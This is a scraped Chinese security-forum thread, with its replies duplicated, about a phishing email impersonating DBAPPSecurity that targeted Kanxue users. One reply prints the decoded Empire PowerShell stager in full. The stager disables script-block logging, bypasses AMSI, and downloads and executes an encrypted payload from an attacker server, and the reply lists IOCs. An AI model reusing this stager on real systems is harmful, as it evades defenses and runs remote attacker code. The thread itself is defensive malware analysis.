[注意]收到一个木马邮件，发上来大家玩玩-软件逆向-看雪-安全社区|安全招聘|kanxue.com

最新回复 (11)
任蝶飞雪币： 6437 活跃值： (4519) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 249 粉丝 0 关注私信	任蝶飞 2 楼先不说技术，这个中文看着像是机器翻译的。。。 2019-11-5 10:36 0
kanxue 雪币： 58782 活跃值： (21941) 能力值： (RANK：350 ) 在线值：发帖 2384 回帖 17068 粉丝 616 关注私信	kanxue 8 3 楼第一封邮件冒充安恒公司，下面还有一个安恒的logo。安恒的官网是：f93K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2V1j5X3q4H3M7s2y4W2j5%4g2J5K9i4c8&6i4K6u0W2j5$3!0E0i4K6u0W2j5$3&6Q4x3V1j5`. 2019-11-5 10:41 0
boursonjane 雪币： 2553 活跃值： (3439) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 189 粉丝 13 关注私信	boursonjane 4 楼其实是中国人, 故意用机翻, 假冒自己是外国人 2019-11-5 11:45 0
jishuzhain 雪币： 17428 活跃值： (5064) 能力值： ( LV9，RANK：450 ) 在线值：发帖 52 回帖 137 粉丝 68 关注私信	jishuzhain 7 5 楼恶意代码是powershell payload，使用的是Empire项目生成的payload，解码后如下： IF($PSVErSIoNTABLe.PSVerSion.MAJor -ge 3){$GPS=[rEf].AssEmBLY.GetTYPe('System.Management.Automation.Utils')."GetFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUe($nulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElsE{[SCrIpTBLock]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SetVALuE($Null,(NEW-ObjecT COLlectionS.GEnEriC.HaShSEt[sTRInG]))}[REf].ASSeMBLy.GetTypE('System.Management.Automation.AmsiUtils')\|?{$_}\|%{$_.GetFIELD('amsiInitFailed','NonPublic,Static').SETVaLUE($nuLl,$TrUe)};};[SySTem.NEt.ServICePoinTMANAGer]::ExPecT100CONtinUe=0;$wC=NeW-ObjECT SySTEM.NeT.WEbCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEadERS.Add('User-Agent',$u);$wc.PROxY=[SyStEm.NeT.WeBREQuEST]::DefAultWeBPROXY;$wC.PRoxy.CReDenTiALS = [SySTEM.NEt.CredEntiAlCACHe]::DEfaultNEtWORKCrEdEnTialS;$Script:Proxy = $wc.Proxy;$K=[SYStem.TexT.ENCODInG]::ASCII.GeTByTES('.};Pw5=?crvu0~mikL#*&_%qOFHREj:\|');$R={$D,$K=$ARGs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://www2.netstorehosting.com:80';$t='/login/process.php';$WC.HEAdERs.ADd("Cookie","session=szQQtljIH3ITKRUXhK+5KeXNHE8=");$DATa=$WC.DOwnlOAdDAtA($sER+$T);$iv=$data[0..3];$dAtA=$DATA[4..$DAtA.LEngtH];-join[CHaR[]](& $R $dATA ($IV+$K))\|IEX IOC 如下： url a19K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3c8T1j5i4m8H3M7$3g2U0N6i4u0@1K9i4W2Q4x3X3g2U0L8$3#2Q4x3V1k6H3k6h3c8A6P5g2)9J5c8X3g2J5M7X3!0J5i4K6u0W2K9s2c8S2 sha256 93b1707cbe27f7f515c089b6896591df616ce8c37b9fbbe932337f9531e20d57 sha1 f49d99a94c4c643270578106ef39f0f07f2696c8 md5 584437bc8063b64fb65d2882a7ddbd89 domain www2.netstorehosting.com ip 45.89.175.192 2019-11-5 11:55 0
無材雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	無材 6 楼是冒充安恒的钓鱼链接，安恒是dbappsecu `rity`，链接中是dbappsecu `rtiy` 2019-11-5 12:21 0
冰雪冬樱雪币： 162 活跃值： (119) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 234 粉丝 1 关注私信	冰雪冬樱 7 楼钓鱼安全论坛管理怎么想的 2019-11-5 13:44 0
熊猫正正雪币： 2573 活跃值： (4323) 能力值： ( LV13，RANK：540 ) 在线值：发帖 138 回帖 898 粉丝 194 关注私信	熊猫正正 9 8 楼冒充安恒信息对看雪论坛的一次定向钓鱼攻击 33dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`. 最后于 2019-11-5 14:49 被熊猫正正编辑，原因： 2019-11-5 14:48 0
挽梦雪舞雪币： 26136 活跃值： (1409) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 432 粉丝 22 关注私信	挽梦雪舞 9 楼我就“傻傻”地直接在Chrome上打开了链接，可惜标红拦截了。。哎，失望。。 2019-11-5 15:01 0
新user 雪币： 1408 活跃值： (68) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	新user 10 楼熊猫正正冒充安恒信息对看雪论坛的一次定向钓鱼攻击 c87K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`. 这波分析是真的快， 2019-11-5 15:02 0
frozenrain 雪币： 107 活跃值： (2222) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 517 粉丝 1 关注私信	frozenrain 11 楼坛主用的是Mac，对坛主进行apt攻击失败。 2019-11-5 19:47 0
首席小白雪币： 286 活跃值： (28) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	首席小白 12 楼 Freebuf上发了这帖子出来..针对看雪的钓鱼..好像也没说出个所以然.23333 2019-11-6 09:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (11)
任蝶飞雪币： 6437 活跃值： (4519) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 249 粉丝 0 关注私信	任蝶飞 2 楼先不说技术，这个中文看着像是机器翻译的。。。 2019-11-5 10:36 0
kanxue 雪币： 58782 活跃值： (21941) 能力值： (RANK：350 ) 在线值：发帖 2384 回帖 17068 粉丝 616 关注私信	kanxue 8 3 楼第一封邮件冒充安恒公司，下面还有一个安恒的logo。安恒的官网是：f93K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2V1j5X3q4H3M7s2y4W2j5%4g2J5K9i4c8&6i4K6u0W2j5$3!0E0i4K6u0W2j5$3&6Q4x3V1j5`. 2019-11-5 10:41 0
boursonjane 雪币： 2553 活跃值： (3439) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 189 粉丝 13 关注私信	boursonjane 4 楼其实是中国人, 故意用机翻, 假冒自己是外国人 2019-11-5 11:45 0
jishuzhain 雪币： 17428 活跃值： (5064) 能力值： ( LV9，RANK：450 ) 在线值：发帖 52 回帖 137 粉丝 68 关注私信	jishuzhain 7 5 楼恶意代码是powershell payload，使用的是Empire项目生成的payload，解码后如下： IF($PSVErSIoNTABLe.PSVerSion.MAJor -ge 3){$GPS=[rEf].AssEmBLY.GetTYPe('System.Management.Automation.Utils')."GetFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUe($nulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElsE{[SCrIpTBLock]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SetVALuE($Null,(NEW-ObjecT COLlectionS.GEnEriC.HaShSEt[sTRInG]))}[REf].ASSeMBLy.GetTypE('System.Management.Automation.AmsiUtils')\|?{$_}\|%{$_.GetFIELD('amsiInitFailed','NonPublic,Static').SETVaLUE($nuLl,$TrUe)};};[SySTem.NEt.ServICePoinTMANAGer]::ExPecT100CONtinUe=0;$wC=NeW-ObjECT SySTEM.NeT.WEbCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEadERS.Add('User-Agent',$u);$wc.PROxY=[SyStEm.NeT.WeBREQuEST]::DefAultWeBPROXY;$wC.PRoxy.CReDenTiALS = [SySTEM.NEt.CredEntiAlCACHe]::DEfaultNEtWORKCrEdEnTialS;$Script:Proxy = $wc.Proxy;$K=[SYStem.TexT.ENCODInG]::ASCII.GeTByTES('.};Pw5=?crvu0~mikL#*&_%qOFHREj:\|');$R={$D,$K=$ARGs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://www2.netstorehosting.com:80';$t='/login/process.php';$WC.HEAdERs.ADd("Cookie","session=szQQtljIH3ITKRUXhK+5KeXNHE8=");$DATa=$WC.DOwnlOAdDAtA($sER+$T);$iv=$data[0..3];$dAtA=$DATA[4..$DAtA.LEngtH];-join[CHaR[]](& $R $dATA ($IV+$K))\|IEX IOC 如下： url a19K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3c8T1j5i4m8H3M7$3g2U0N6i4u0@1K9i4W2Q4x3X3g2U0L8$3#2Q4x3V1k6H3k6h3c8A6P5g2)9J5c8X3g2J5M7X3!0J5i4K6u0W2K9s2c8S2 sha256 93b1707cbe27f7f515c089b6896591df616ce8c37b9fbbe932337f9531e20d57 sha1 f49d99a94c4c643270578106ef39f0f07f2696c8 md5 584437bc8063b64fb65d2882a7ddbd89 domain www2.netstorehosting.com ip 45.89.175.192 2019-11-5 11:55 0
無材雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	無材 6 楼是冒充安恒的钓鱼链接，安恒是dbappsecu `rity`，链接中是dbappsecu `rtiy` 2019-11-5 12:21 0
冰雪冬樱雪币： 162 活跃值： (119) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 234 粉丝 1 关注私信	冰雪冬樱 7 楼钓鱼安全论坛管理怎么想的 2019-11-5 13:44 0
熊猫正正雪币： 2573 活跃值： (4323) 能力值： ( LV13，RANK：540 ) 在线值：发帖 138 回帖 898 粉丝 194 关注私信	熊猫正正 9 8 楼冒充安恒信息对看雪论坛的一次定向钓鱼攻击 33dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`. 最后于 2019-11-5 14:49 被熊猫正正编辑，原因： 2019-11-5 14:48 0
挽梦雪舞雪币： 26136 活跃值： (1409) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 432 粉丝 22 关注私信	挽梦雪舞 9 楼我就“傻傻”地直接在Chrome上打开了链接，可惜标红拦截了。。哎，失望。。 2019-11-5 15:01 0
新user 雪币： 1408 活跃值： (68) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	新user 10 楼熊猫正正冒充安恒信息对看雪论坛的一次定向钓鱼攻击 c87K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`. 这波分析是真的快， 2019-11-5 15:02 0
frozenrain 雪币： 107 活跃值： (2222) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 517 粉丝 1 关注私信	frozenrain 11 楼坛主用的是Mac，对坛主进行apt攻击失败。 2019-11-5 19:47 0
首席小白雪币： 286 活跃值： (28) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	首席小白 12 楼 Freebuf上发了这帖子出来..针对看雪的钓鱼..好像也没说出个所以然.23333 2019-11-6 09:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[注意]收到一个木马邮件，发上来大家玩玩

冒充安恒信息对看雪论坛的一次定向钓鱼攻击 33dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`.